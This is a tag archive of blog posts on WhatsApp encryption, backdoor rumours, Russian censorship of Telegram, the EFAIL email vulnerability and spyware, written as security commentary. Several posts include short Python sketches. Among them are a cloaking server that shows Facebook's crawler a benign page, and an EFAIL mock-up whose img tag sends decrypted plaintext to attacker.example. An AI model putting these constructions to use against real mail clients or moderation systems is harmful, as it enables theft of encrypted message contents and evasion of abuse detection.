Tag Archives: whatsapp

More on Backdooring (or Not) WhatsApp

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/08/more_on_backdoo.html

Yesterday, I blogged about a Facebook plan to backdoor WhatsApp by adding client-side scanning and filtering. It seems that I was wrong, and there are no such plans.

The only source for that post was a Forbes essay by Kalev Leetaru, which links to a previous Forbes essay by him, which links to a video presentation from a Facebook developers conference.

Leetaru extrapolated a lot out of very little. I watched the video (the relevant section is at the 23:00 mark), and it doesn’t talk about client-side scanning of messages. It doesn’t talk about messaging apps at all. It discusses using AI techniques to find bad content on Facebook, and the difficulties that arise from dynamic content:

So far, we have been keeping this fight [against bad actors and harmful content] on familiar grounds. And that is, we have been training our AI models on the server and making inferences on the server when all the data are flooding into our data centers.

While this works for most scenarios, it is not the ideal setup for some unique integrity challenges. URL masking is one such problem which is very hard to do. We have the traditional way of server-side inference. What is URL masking? Let us imagine that a user sees a link on the app and decides to click on it. When they click on it, Facebook actually logs the URL to crawl it at a later date. But…the publisher can dynamically change the content of the webpage to make it look more legitimate [to Facebook]. But then our users click on the same link, they see something completely different — oftentimes it is disturbing; oftentimes it violates our policy standards. Of course, this creates a bad experience for our community that we would like to avoid. This and similar integrity problems are best solved with AI on the device.

That might be true, but it also would hand whatever secret-AI sauce Facebook has to every one of its users to reverse engineer — which means it’s probably not going to happen. And it is a dumb idea, for reasons Steve Bellovin has pointed out.
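
To make the cloaking problem concrete, here is a minimal publisher-side sketch. It is my own illustration, not anything from the talk: the route and page contents are invented, though "facebookexternalhit" is the user-agent string Facebook's link crawler really sends. A cloaking site simply branches on who is asking:

```python
# Hypothetical cloaking site: serve a benign page to Facebook's crawler and
# something else to the humans who click the link. Requires Flask.
from flask import Flask, request

app = Flask(__name__)

BENIGN_PAGE = "<html><body>A harmless recipe blog.</body></html>"
ABUSIVE_PAGE = "<html><body>...policy-violating content...</body></html>"

@app.route("/article")
def article():
    ua = request.headers.get("User-Agent", "")
    # "facebookexternalhit" is Facebook's link-crawler user agent; a cloaker
    # can branch on it (or on the crawler's published IP ranges).
    if "facebookexternalhit" in ua:
        return BENIGN_PAGE   # what any server-side check sees
    return ABUSIVE_PAGE      # what a user who clicks the link sees

if __name__ == "__main__":
    app.run()
```

A server-side crawl only ever sees the first branch, which is the talk's argument for running the check on the device, where the page the user actually received is visible.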

Facebook’s first published response was a comment on the Hacker News website from a user named “wcathcart,” which Nate Cardozo (more on him below) assures me is Will Cathcart, the vice president of WhatsApp. (I have no reason to doubt his identity, but surely there is a more official channel Facebook could have used if it wanted to.) Cathcart wrote:

We haven’t added a backdoor to WhatsApp. The Forbes contributor referred to a technical talk about client side AI in general to conclude that we might do client side scanning of content on WhatsApp for anti-abuse purposes.

To be crystal clear, we have not done this, have zero plans to do so, and if we ever did it would be quite obvious and detectable that we had done it. We understand the serious concerns this type of approach would raise which is why we are opposed to it.

Facebook’s second published response was a comment on my original blog post, which has been confirmed to me by the WhatsApp people as authentic. It’s more of the same.

So, this was a false alarm. And, to be fair, Alec Muffett called foul on the first Forbes piece:

So, here’s my pre-emptive finger wag: Civil Society’s pack mentality can make us our own worst enemies. If we go around repeating one man’s Germanic conspiracy theory, we may doom ourselves to precisely what we fear. Instead, we should — we must — take steps to constructively demand what we actually want: End to End Encryption which is worthy of the name.

Blame accepted. But in general, this is the sort of thing we need to watch for. End-to-end encryption only secures data in transit. The data has to be in the clear on the device where it is created, and it has to be in the clear on the device where it is consumed. Those are the obvious places for an eavesdropper to get a copy.

This has been a long process. Facebook desperately wanted to convince me to correct the record, while at the same time not wanting to write something on their own letterhead (just a couple of comments, so far). I spoke at length with Privacy Policy Manager Nate Cardozo, whom Facebook hired last December from EFF. (Back then, I remember thinking of him — and the two other new privacy hires — as basically human warrant canaries. If they ever leave Facebook under non-obvious circumstances, we know that things are bad.) He basically leveraged his historical reputation to assure me that WhatsApp, and Facebook in general, would never do something like this. I am trusting him, while also reminding everyone that Facebook has broken so many privacy promises that they really can’t be trusted.

Final note: If they want to be trusted, Adam Shostack and I gave them a road map.

Hacker News thread.

EDITED TO ADD (8/4): Slashdot covered my retraction.

Facebook Plans on Backdooring WhatsApp

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/08/facebook_plans_.html

This article points out that Facebook’s planned content moderation scheme will result in an encryption backdoor into WhatsApp:

In Facebook’s vision, the actual end-to-end encryption client itself such as WhatsApp will include embedded content moderation and blacklist filtering algorithms. These algorithms will be continually updated from a central cloud service, but will run locally on the user’s device, scanning each cleartext message before it is sent and each encrypted message after it is decrypted.

The company even noted that when it detects violations it will need to quietly stream a copy of the formerly encrypted content back to its central servers to analyze further, even if the user objects, acting as true wiretapping service.

Facebook’s model entirely bypasses the encryption debate by globalizing the current practice of compromising devices by building those encryption bypasses directly into the communications clients themselves and deploying what amounts to machine-based wiretaps to billions of users at once.

Once this is in place, it’s easy for the government to demand that Facebook add another filter — one that searches for communications that they care about — and alert them when it gets triggered.

Of course alternatives like Signal will exist for those who don’t want to be subject to Facebook’s content moderation, but what happens when this filtering technology is built into operating systems?

The problem is that if Facebook’s model succeeds, it will only be a matter of time before device manufacturers and mobile operating system developers embed similar tools directly into devices themselves, making them impossible to escape. Embedding content scanning tools directly into phones would make it possible to scan all apps, including ones like Signal, effectively ending the era of encrypted communications.

I don’t think this will happen — why would AT&T care about content moderation? — but it is something to watch.
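
To see why the scheme described above counts as a backdoor even though the encryption itself is never broken, here is a minimal sketch of that architecture. Everything in it is hypothetical: the blacklist, the hash matching, and the reporting call are invented, and none of this is published Facebook code.

```python
# Sketch of client-side scanning: the filter runs on the cleartext *before*
# end-to-end encryption, so the crypto is bypassed rather than broken.
import hashlib

# In the feared design, this set is continually pushed down from a central
# cloud service.
BLACKLIST = {hashlib.sha256(b"banned message").hexdigest()}

def report_to_server(plaintext: bytes) -> None:
    # The "quietly stream a copy back" step: cleartext leaves the device.
    print("uploading flagged cleartext for review:", plaintext)

def send_message(plaintext: bytes, encrypt) -> bytes:
    if hashlib.sha256(plaintext).hexdigest() in BLACKLIST:
        report_to_server(plaintext)   # happens regardless of user consent
    return encrypt(plaintext)         # normal E2E encryption then proceeds

# Demo with a stand-in "cipher"; a real client would use the Signal protocol.
send_message(b"banned message", encrypt=lambda p: bytes(reversed(p)))
```

And the government-demanded filter described above is one line: another entry in the blacklist.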

EDITED TO ADD (8/2): This story is wrong. Read my correction.

WhatsApp Vulnerability Fixed

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/05/whatsapp_vulner_1.html

WhatsApp fixed a devastating vulnerability that allowed someone to remotely hack a phone by initiating a WhatsApp voice call. The recipient didn’t even have to answer the call.

The Israeli cyber-arms manufacturer NSO Group is believed to be behind the exploit, but of course there is no definitive proof.

If you use WhatsApp, update your app immediately.

Judging Facebook’s Privacy Shift

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/03/judging_faceboo.html

Facebook is making a new and stronger commitment to privacy. Last month, the company hired three of its most vociferous critics and installed them in senior technical positions. And on Wednesday, Mark Zuckerberg wrote that the company will pivot to focus on private conversations over the public sharing that has long defined the platform, even while conceding that “frankly we don’t currently have a strong reputation for building privacy protective services.”

There is ample reason to question Zuckerberg’s pronouncement: The company has made — and broken — many privacy promises over the years. And if you read his 3,000-word post carefully, Zuckerberg says nothing about changing Facebook’s surveillance capitalism business model. All the post discusses is making private chats more central to the company, which seems to be a play for increased market dominance and to counter the Chinese company WeChat.

In security and privacy, the devil is always in the details — and Zuckerberg’s post provides none. But we’ll take him at his word and try to fill in some of the details here. What follows is a list of changes we should expect if Facebook is serious about changing its business model and improving user privacy.

How Facebook treats people on its platform

Increased transparency over advertiser and app access to user data. Today, Facebook users can download and view much of the data the company has about them. This is important, but it doesn’t go far enough. The company could be more transparent about what data it shares with advertisers and others and how it allows advertisers to select the users they show ads to. Facebook could use its substantial skills in usability testing to help people understand the mechanisms advertisers use to show them ads, or the reasoning behind what it chooses to show in user timelines. It could deliver on its promises in this area.

Better — and more usable — privacy options. Facebook users have limited control over how their data is shared with other Facebook users and almost no control over how it is shared with Facebook’s advertisers, which are the company’s real customers. Moreover, the controls are buried deep behind complex and confusing menu options. To be fair, some of this is because privacy is complex, and it’s hard to understand the results of different options. But much of this is deliberate; Facebook doesn’t want its users to make their data private from other users.

The company could give people better control over how — and whether — their data is used, shared, and sold. For example, it could allow users to turn off individually targeted news and advertising. By this, we don’t mean simply making those advertisements invisible; we mean turning off the data flows into those tailoring systems. Finally, since most users stick to the default options when it comes to configuring their apps, a changing Facebook could tilt those defaults toward more privacy, requiring less tailoring most of the time.

More user protection from stalking. “Facebook stalking” is often thought of as “stalking light,” or “harmless.” But stalkers are rarely harmless. Facebook should acknowledge this class of misuse and work with experts to build tools that protect all of its users, especially its most vulnerable ones. Such tools should guide normal people away from creepiness and give victims power and flexibility to enlist aid from sources ranging from advocates to police.

Fully ending real-name enforcement. Facebook’s real-names policy, requiring people to use their actual legal names on the platform, hurts people such as activists, victims of intimate partner violence, police officers whose work makes them targets, and anyone with a public persona who wishes to have control over how they identify to the public. There are many ways Facebook can improve on this, from ending enforcement to allowing verified pseudonyms for everyone — not just celebrities like Lady Gaga. Doing so would mark a clear shift.

How Facebook runs its platform

Increased transparency of Facebook’s business practices. One of the hard things about evaluating Facebook is the effort needed to get good information about its business practices. When violations are exposed by the media, as they regularly are, we are all surprised at the different ways Facebook violates user privacy. Most recently, the company used phone numbers provided for two-factor authentication for advertising and networking purposes. Facebook needs to be both explicit and detailed about how and when it shares user data. In fact, a move from discussing “sharing” to discussing “transfers,” “access to raw information,” and “access to derived information” would be a visible improvement.

Increased transparency regarding censorship rules. Facebook makes choices about what content is acceptable on its site. Those choices are controversial, implemented by thousands of low-paid workers quickly applying unclear rules. These are tremendously hard problems without clear solutions. Even obvious rules like banning hateful words run into challenges when people try to legitimately discuss certain important topics. Whatever Facebook does in this regard, the company needs to be more transparent about its processes. It should allow regulators and the public to audit the company’s practices. Moreover, Facebook should share any innovative engineering solutions with the world, much as it currently shares its data center engineering.

Better security for collected user data. There have been numerous examples of attackers targeting cloud service platforms to gain access to user data. Facebook has a large and skilled product security team that says some of the right things. That team needs to be involved in the design trade-offs for features and not just review the near-final designs for flaws. Shutting down a feature based on internal security analysis would be a clear message.

Better data security so Facebook sees less. Facebook eavesdrops on almost every aspect of its users’ lives. On the other hand, WhatsApp — purchased by Facebook in 2014 — provides users with end-to-end encrypted messaging. While Facebook knows who is messaging whom and how often, Facebook has no way of learning the contents of those messages. Recently, Facebook announced plans to combine WhatsApp, Facebook Messenger, and Instagram, extending WhatsApp’s security to the consolidated system. Changing course here would be a dramatic and negative signal.

Collecting less data from outside of Facebook. Facebook doesn’t just collect data about you when you’re on the platform. Because its “like” button is on so many other pages, the company can collect data about you when you’re not on Facebook. It even collects what it calls “shadow profiles” — data about you even if you’re not a Facebook user. This data is combined with other surveillance data the company buys, including health and financial data. Collecting and saving less of this data would be a strong indicator of a new direction for the company.

Better use of Facebook data to prevent violence. There is a trade-off between Facebook seeing less and Facebook doing more to prevent hateful and inflammatory speech. Dozens of people have been killed by mob violence because of fake news spread on WhatsApp. If Facebook were doing a convincing job of controlling fake news without end-to-end encryption, then we would expect to hear how it could use patterns in metadata to handle encrypted fake news.

How Facebook manages for privacy

Create a team measured on privacy and trust. Where companies spend their money tells you what matters to them. Facebook has a large and important growth team, but what team, if any, is responsible for privacy, not as a matter of compliance or pushing the rules, but for engineering? Transparency in how it is staffed relative to other teams would be telling.

Hire a senior executive responsible for trust. Facebook’s current team has been focused on growth and revenue. Its chief security officer, Alex Stamos, was not replaced when he left in 2018, which may indicate that having an advocate for security on the leadership team led to debate and disagreement. Retaining a voice for security and privacy issues at the executive level, before those issues affected users, was a good thing. Now that responsibility is diffuse. It’s unclear how Facebook measures and assesses its own progress and who might be held accountable for failings. Facebook can begin the process of fixing this by designating a senior executive who is responsible for trust.

Engage with regulators. Much of Facebook’s posturing seems to be an attempt to forestall regulation. Facebook sends lobbyists to Washington and other capitals, and until recently the company sent support staff to politicians’ offices. It has run secret lobbying campaigns against privacy laws. And Facebook has repeatedly violated a 2011 Federal Trade Commission consent order regarding user privacy. Regulating big technical projects is not easy. Most of the people who understand how these systems work understand them because they build them. Societies will regulate Facebook, and the quality of that regulation requires real education of legislators and their staffs. While businesses often want to avoid regulation, any focus on privacy will require strong government oversight. If Facebook is serious about privacy being a real interest, it will accept both government regulation and community input.

User privacy is traditionally against Facebook’s core business interests. Advertising is its business model, and targeted ads sell better and more profitably — and that requires users to engage with the platform as much as possible. Increased pressure on Facebook to manage propaganda and hate speech could easily lead to more surveillance. But there is pressure in the other direction as well, as users equate privacy with increased control over how they present themselves on the platform.

We don’t expect Facebook to abandon its advertising business model, relent in its push for monopolistic dominance, or fundamentally alter its social networking platforms. But the company can give users important privacy protections and controls without abandoning surveillance capitalism. While some of these changes will reduce profits in the short term, we hope Facebook’s leadership realizes that they are in the best long-term interest of the company.

Facebook talks about community and bringing people together. These are admirable goals, and there’s plenty of value (and profit) in having a sustainable platform for connecting people. But as long as the most important measure of success is short-term profit, doing things that help strengthen communities will fall by the wayside. Surveillance, which allows individually targeted advertising, will be prioritized over user privacy. Outrage, which drives engagement, will be prioritized over feelings of belonging. And corporate secrecy, which allows Facebook to evade both regulators and its users, will be prioritized over societal oversight. If Facebook now truly believes that these latter options are critical to its long-term success as a company, we welcome the changes that are forthcoming.

This essay was co-authored with Adam Shostack, and originally appeared on Medium OneZero. We wrote a similar essay in 2002 about judging Microsoft’s then newfound commitment to security.

Russian Censorship of Telegram

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/06/russian_censors.html

Internet censors have a new strategy in their bid to block applications and websites: pressuring the large cloud providers that host them. These providers have concerns that are much broader than the targets of censorship efforts, so they have the choice of either standing up to the censors or capitulating in order to maximize their business. Today’s Internet largely reflects the dominance of a handful of companies behind the cloud services, search engines and mobile platforms that underpin the technology landscape. This new centralization radically tips the balance between those who want to censor parts of the Internet and those trying to evade censorship. When the profitable answer is for a software giant to acquiesce to censors’ demands, how long can Internet freedom last?

The recent battle between the Russian government and the Telegram messaging app illustrates one way this might play out. Russia has been trying to block Telegram since April, when a Moscow court banned it after the company refused to give Russian authorities access to user messages. Telegram, which is widely used in Russia, works on both iPhone and Android, and there are Windows and Mac desktop versions available. The app offers optional end-to-end encryption, meaning that all messages are encrypted on the sender’s phone and decrypted on the receiver’s phone; no part of the network can eavesdrop on the messages.

Since then, Telegram has been playing cat-and-mouse with the Russian telecom regulator Roskomnadzor by varying the IP address the app uses to communicate. Because Telegram isn’t a fixed website, it doesn’t need a fixed IP address. Telegram bought tens of thousands of IP addresses and has been quickly rotating through them, staying a step ahead of censors. Cleverly, this tactic is invisible to users. The app never sees the change, or the entire list of IP addresses, and the censor has no clear way to block them all.
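
The tactic is simple enough to sketch. Here is a toy version of such failover logic, assuming a client that ships with (and keeps receiving) a pool of endpoint addresses; the addresses below are from documentation ranges, and this is not Telegram's actual client code.

```python
# Toy endpoint rotation: try addresses from a pool until one connects.
# The censor must discover and block every address to break connectivity.
import socket

ENDPOINT_POOL = [  # in reality: tens of thousands of addresses, updated in-app
    ("203.0.113.10", 443),
    ("198.51.100.27", 443),
    ("192.0.2.81", 443),
]

def connect(timeout: float = 3.0) -> socket.socket:
    last_error = None
    for host, port in ENDPOINT_POOL:
        try:
            # The user never sees which address worked; rotation is invisible.
            return socket.create_connection((host, port), timeout=timeout)
        except OSError as err:   # blocked, filtered, or unreachable
            last_error = err
    raise ConnectionError("all endpoints blocked") from last_error
```

Blocking any one address accomplishes nothing; the censor has to find and block the whole pool, which keeps being refreshed.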

A week after the court ban, Roskomnadzor countered with an unprecedented move of its own: blocking 19 million IP addresses, many on Amazon Web Services and Google Cloud. The collateral damage was widespread: The action inadvertently broke many other web services that use those platforms, and Roskomnadzor scaled back after it became clear that its action had affected services critical for Russian business. Even so, the censor is still blocking millions of IP addresses.

More recently, Russia has been pressuring Apple not to offer the Telegram app in its iPhone App Store. As of this writing, Apple has not complied, and the company has allowed Telegram to download a critical software update to iPhone users (after what the app’s founder called a delay last month). Roskomnadzor could further pressure Apple, though, including by threatening to turn off its entire iPhone app business in Russia.

Telegram might seem a weird app for Russia to focus on. Those of us who work in security don’t recommend the program, primarily because of the nature of its cryptographic protocols. In general, proprietary cryptography has numerous fatal security flaws. We generally recommend Signal for secure messaging, or, if having that program on your computer is somehow incriminating, WhatsApp. (More than 1.5 billion people worldwide use WhatsApp.) What Telegram has going for it is that it works really well on lousy networks. That’s why it is so popular in places like Iran and Afghanistan. (Iran is also trying to ban the app.)

What the Russian government doesn’t like about Telegram is its anonymous broadcast feature — channel capability and chats — which makes it an effective platform for political debate and citizen journalism. The Russians might not like that Telegram is encrypted, but odds are good that they can simply break the encryption. Telegram’s role in facilitating uncontrolled journalism is the real issue.

Iran’s attempts to block Telegram have been more successful than Russia’s, less because Iran’s censorship technology is more sophisticated and more because Telegram is not willing to go as far to defend Iranian users. The reasons are not rooted in business decisions. Simply put, Telegram is a Russian product and the designers are more motivated to poke Russia in the eye. Pavel Durov, Telegram’s founder, has pledged millions of dollars to help fight Russian censorship.

For the moment, Russia has lost. But this battle is far from over. Russia could easily come back with more targeted pressure on Google, Amazon and Apple. A year earlier, Zello used the same trick Telegram is using to evade Russian censors. Then, Roskomnadzor threatened to block all of Amazon Web Services and Google Cloud; and in that instance, both companies forced Zello to stop its IP-hopping censorship-evasion tactic.

Russia could also further develop its censorship infrastructure. If its capabilities were as finely honed as China’s, it would be able to more effectively block Telegram from operating. Right now, Russia can block only specific IP addresses, which is too coarse a tool for this issue. Telegram’s voice capabilities in Russia are significantly degraded, however, probably because high-capacity IP addresses are easier to block.

Whatever its current frustrations, Russia might well win in the long term. By demonstrating its willingness to suffer the temporary collateral damage of blocking major cloud providers, it prompted cloud providers to block another and more effective anti-censorship tactic, or at least accelerated the process. In April, Google and Amazon banned — and technically blocked — the practice of “domain fronting,” a trick anti-censorship tools use to get around Internet censors by pretending to be other kinds of traffic. Developers would use popular websites as a proxy, routing traffic to their own servers through another website — in this case Google.com — to fool censors into believing the traffic was intended for Google.com. The anonymous web-browsing tool Tor has used domain fronting since 2014. Signal, since 2016. Eliminating the capability is a boon to censors worldwide.
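
For readers unfamiliar with the mechanics, here is a minimal sketch of domain fronting as it worked before those bans. The backend name is invented, and the major clouds now reject such mismatched requests.

```python
# Domain fronting sketch: the censor sees a TLS connection to www.google.com
# (the name in the SNI field), while the Host header -- encrypted inside the
# TLS tunnel -- routes the request to the real, blocked backend.
import http.client
import ssl

context = ssl.create_default_context()

# Outer layer, visible to the censor: a handshake with the front domain.
conn = http.client.HTTPSConnection("www.google.com", 443, context=context)

# Inner layer, hidden by TLS: the Host header names the true destination
# ("fronted-backend.appspot.com" is a hypothetical example).
conn.request("GET", "/", headers={"Host": "fronted-backend.appspot.com"})
print(conn.getresponse().status)
```

What Google and Amazon banned was exactly this mismatch between the name in the TLS handshake and the name in the Host header.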

Tech giants have gotten embroiled in censorship battles for years. Sometimes they fight and sometimes they fold, but until now there have always been options. What this particular fight highlights is that Internet freedom is increasingly in the hands of the world’s largest Internet companies. And while freedom may have its advocates — the American Civil Liberties Union has tweeted its support for those companies, and some 12,000 people in Moscow protested against the Telegram ban — actions such as disallowing domain fronting illustrate that getting the big tech companies to sacrifice their near-term commercial interests will be an uphill battle. Apple has already removed anti-censorship apps from its Chinese app store.

In 1993, John Gilmore famously said that “The Internet interprets censorship as damage and routes around it.” That was technically true when he said it but only because the routing structure of the Internet was so distributed. As centralization increases, the Internet loses that robustness, and censorship by governments and companies becomes easier.

This essay previously appeared on Lawfare.com.

Schrems Files Complaints Against Google, Facebook, Instagram, and WhatsApp

Post Syndicated from nellyo original https://nellyo.wordpress.com/2018/05/27/gdpr-schrems/

Max Schrems has filed complaints against Google, Facebook, Instagram, and WhatsApp. The reason, according to him, is that the choice their users face is unlawful: accept the companies’ terms or lose access to their services.

The “agree or leave” approach, Schrems told Reuters Television, violates people’s right under the General Data Protection Regulation (GDPR) to choose freely whether to allow companies to use their data. There has to be a choice, Schrems argues.

Schrems is the Austrian who is never quite satisfied with how social networks protect personal data and will not leave them in peace; a lawyer, he has turned his fight for data protection into a profession. This time he is acting through noyb, a non-governmental organization he founded.

Independent.ie 

The Guardian

Details on a New PGP Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/05/details_on_a_ne.html

A new PGP vulnerability was announced today. Basically, the vulnerability makes use of the fact that modern e-mail programs allow for embedded HTML objects. If an attacker can intercept and modify a message in transit, he can insert code that sends the plaintext in a URL to a remote website. Very clever.

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.
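
The channel is easy to sketch. Below is a simplified mock-up of EFAIL’s “direct exfiltration” variant, assuming a vulnerable client that decrypts the encrypted part and renders all MIME parts as one HTML document. The attacker.example domain and the ciphertext placeholder are invented, and the published attacks also include a CBC/CFB “gadget” variant not shown here.

```python
# The attacker rewraps an intercepted encrypted message inside HTML so the
# victim's own client leaks the decrypted plaintext via an image URL.
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

msg = MIMEMultipart()

# Part 1: opens an <img> tag whose URL is deliberately left unterminated.
msg.attach(MIMEText('<img src="http://attacker.example/steal?txt=', "html"))

# Part 2: the original, unmodified ciphertext. The victim's client decrypts
# it and splices the plaintext into the surrounding HTML...
msg.attach(MIMEText("-----BEGIN PGP MESSAGE----- ... -----END PGP MESSAGE-----",
                    "plain"))

# Part 3: closes the quote and the tag, so the whole decrypted plaintext ends
# up inside the image URL and is sent to attacker.example when it loads.
msg.attach(MIMEText('">', "html"))

print(msg.as_string())
```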

A few initial comments:

1. Being able to intercept and modify e-mails in transit is the sort of thing the NSA can do, but is hard for the average hacker. That being said, there are circumstances where someone can modify e-mails. I don’t mean to minimize the seriousness of this attack, but that is a consideration.

2. The vulnerability isn’t with PGP or S/MIME itself, but in the way they interact with modern e-mail programs. You can see this in the two suggested short-term mitigations: “No decryption in the e-mail client,” and “disable HTML rendering.”

3. I’ve been getting some weird press calls from reporters wanting to know if this demonstrates that e-mail encryption is impossible. No, this just demonstrates that programmers are human and vulnerabilities are inevitable. PGP almost certainly has fewer bugs than your average piece of software, but it’s not bug free.

4. Why is anyone using encrypted e-mail anymore, anyway? Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with today’s announcement. If you need to communicate securely, use Signal. If having Signal on your phone will arouse suspicion, use WhatsApp.

I’ll post other commentaries and analyses as I find them.

EDITED TO ADD (5/14): News articles.

Slashdot thread.

Russia is Banning Telegram

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/04/russia_is_banni.html

Russia has banned the secure messaging app Telegram. It’s making an absolute mess of the ban — blocking 16 million IP addresses, many belonging to the Amazon and Google clouds — and it’s not even clear that it’s working. But, more importantly, I’m not convinced Telegram is secure in the first place.

Such a weird story. If you want secure messaging, use Signal. If you’re concerned that having Signal on your phone will itself arouse suspicion, use WhatsApp.

WhatsApp Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/01/whatsapp_vulner.html

A new vulnerability in WhatsApp has been discovered:

…the researchers unearthed far more significant gaps in WhatsApp’s security: They say that anyone who controls WhatsApp’s servers could effortlessly insert new people into an otherwise private group, even without the permission of the administrator who ostensibly controls access to that conversation.

Matthew Green has a good description:

If all you want is the TL;DR, here’s the headline finding: due to flaws in both Signal and WhatsApp (which I single out because I use them), it’s theoretically possible for strangers to add themselves to an encrypted group chat. However, the caveat is that these attacks are extremely difficult to pull off in practice, so nobody needs to panic. But both issues are very avoidable, and tend to undermine the logic of having an end-to-end encryption protocol in the first place.

Here’s the research paper.

Dark Caracal: Global Espionage Malware from Lebanon

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/01/dark_caracal_gl.html

The EFF and Lookout are reporting on a new piece of spyware operating out of Lebanon. It primarily targets mobile devices, compromising them through fake versions of secure messaging clients like Signal and WhatsApp.

From the Lookout announcement:

Dark Caracal has operated a series of multi-platform campaigns starting from at least January 2012, according to our research. The campaigns span across 21+ countries and thousands of victims. Types of data stolen include documents, call records, audio recordings, secure messaging client content, contact information, text messages, photos, and account data. We believe this actor is operating their campaigns from a building belonging to the Lebanese General Security Directorate (GDGS) in Beirut.

It looks like a complex infrastructure that’s been well-developed, and continually upgraded and maintained. It appears that a cyberweapons arms manufacturer is selling this tool to different countries. From the full report:

Dark Caracal is using the same infrastructure as was previously seen in the Operation Manul campaign, which targeted journalists, lawyers, and dissidents critical of the government of Kazakhstan.

There’s a lot in the full report. It’s worth reading.

Three news articles.

Германия: нарушава ли Facebook конкурентното право

Post Syndicated from nellyo original https://nellyo.wordpress.com/2017/12/22/facebook-9/

The competition regulator, the Bundeskartellamt, has notified Facebook in writing of its preliminary legal assessment in the abuse-of-dominance proceedings it is conducting against the company. At this stage of the proceedings, the authority takes the view that Facebook holds a dominant position in the German market for social networks. It believes Facebook abuses that dominance by collecting an unlimited amount of data, including through third-party sites (either ones Facebook owns, such as WhatsApp and Instagram, or other operators’ sites and apps with Facebook APIs embedded). Participation in Facebook is conditional on unrestricted acceptance of the terms of service: users can either accept the whole package or decline to use the social network. A representative of the regulator said that users have not always given effective consent to the tracking of their data and to its consolidation into their Facebook profile.

The Bundeskartellamt is focusing in particular on the collection and use of user data from third-party sources. Users cannot expect data generated when they use services other than Facebook to be added to their Facebook profile to this extent, yet in reality data is transmitted from websites and apps to Facebook. According to the regulator, users should have more control over these processes, and Facebook should give them suitable options for effectively limiting such data collection.

There are proceedings in France as well, but those are being conducted by the data protection regulator and concern the exchange of data between WhatsApp and Facebook.


Daphne Caruana Galizia’s Murder and the Security of WhatsApp

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/11/daphne_caruana_.html

Daphne Caruana Galizia was a Maltese journalist whose anti-corruption investigations exposed powerful people. She was murdered in October by a car bomb.

Galizia used WhatsApp to communicate securely with her sources. Now that she is dead, the Maltese police want to break into her phone or the app, and find out who those sources were.

One journalist reports:

Part of Daphne’s destroyed smart phone was [recovered] from the scene.

Investigators say that Caruana Galizia had not taken her laptop with her on that particular trip. If she had done so, the forensic experts would have found evidence on the ground.

Her mobile phone is also being examined, as can be seen from her WhatsApp profile, which has registered activity since the murder. But it is understood that the data is safe.

Sources close to the newsroom said that as part of the investigation her sim card has been cloned. This is done with the help of mobile service providers in similar cases. Asked if her WhatsApp messages or any other messages that were stored in her phone will be retrieved, the source said that since the messaging application is encrypted, the messages cannot be seen. Therefore it is unlikely that any data can be retrieved.

I am less optimistic than that reporter. The FBI is providing “specific assistance.” The article doesn’t explain that, but I would not be surprised if they were helping crack the phone.

It will be interesting to see if WhatsApp’s security survives this. My guess is that it depends on how much of the phone was recovered from the bombed car.

EDITED TO ADD (11/7): The court-appointed IT expert on the case has a criminal record in the UK for theft and forgery.

"Responsible encryption" fallacies

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/10/responsible-encryption-fallacies.html

Deputy Attorney General Rod Rosenstein gave a speech recently calling for “Responsible Encryption” (a.k.a. “Crypto Backdoors”). It’s full of dangerous ideas that need to be debunked.

The importance of law enforcement

The first third of the speech talks about the importance of law enforcement, as if it’s the only thing standing between us and chaos. It cites the 2016 Mirai attacks as an example of the chaos that will only get worse without stricter law enforcement.

But the Mirai case demonstrated the opposite: how law enforcement is not needed. They made no arrests in the case. A year later, they still haven’t a clue who did it.

Conversely, we technologists have fixed the major infrastructure issues. Specifically, those affected by the DNS outage have moved to multiple DNS providers, including high-capacity providers like Google and Amazon that can handle such large attacks easily.

In other words, we the people fixed the major Mirai problem, and law-enforcement didn’t.

Moreover, instead of being a solution to cyber threats, law enforcement has become a threat itself. The DNC didn’t have the FBI investigate the attacks from Russia likely because they didn’t want the FBI reading all their files and finding wrongdoing by the DNC. It’s not that they did anything actually wrong; it’s more like that famous quote attributed to Richelieu: “Give me six lines written by the most honest of men and I’ll find something to hang him by.” Give all your internal emails over to the FBI and I’m certain they’ll find something to hang you by, if they want.

Or consider the case of Andrew Auernheimer. He found that AT&T’s website made public the user accounts of early iPad owners, so he copied some down and posted them to a news site. AT&T had denied the problem, so making it public was the only way to force them to fix it. Such access to the website was legal, because AT&T had made the data public. However, prosecutors disagreed. In order to protect the powerful, they twisted and perverted the law to put Auernheimer in jail.

It’s not that law enforcement is bad, it’s that it’s not the unalloyed good Rosenstein imagines. When law enforcement becomes the thing Rosenstein describes, it means we live in a police state.

Where law enforcement can’t go

Rosenstein repeats the frequent claim in the encryption debate:

Our society has never had a system where evidence of criminal wrongdoing was totally impervious to detection

Of course our society has places “impervious to detection”, protected by both legal and natural barriers.

An example of a legal barrier is how spouses can’t be forced to testify against each other. This barrier is impervious.

A better example, though, is how so much of government, intelligence, the military, and law enforcement itself is impervious. If prosecutors could gather evidence everywhere, then why isn’t Rosenstein prosecuting those guilty of CIA torture?

Oh, you say, government is a special exception. If that were the case, then why did Rosenstein dedicate a precious third of his speech to discussing the “rule of law” and how it applies to everyone, “protecting people from abuse by the government”? It obviously doesn’t: there’s one rule for government and a different rule for the people, and the rule for government means there are lots of places law enforcement can’t go to gather evidence.

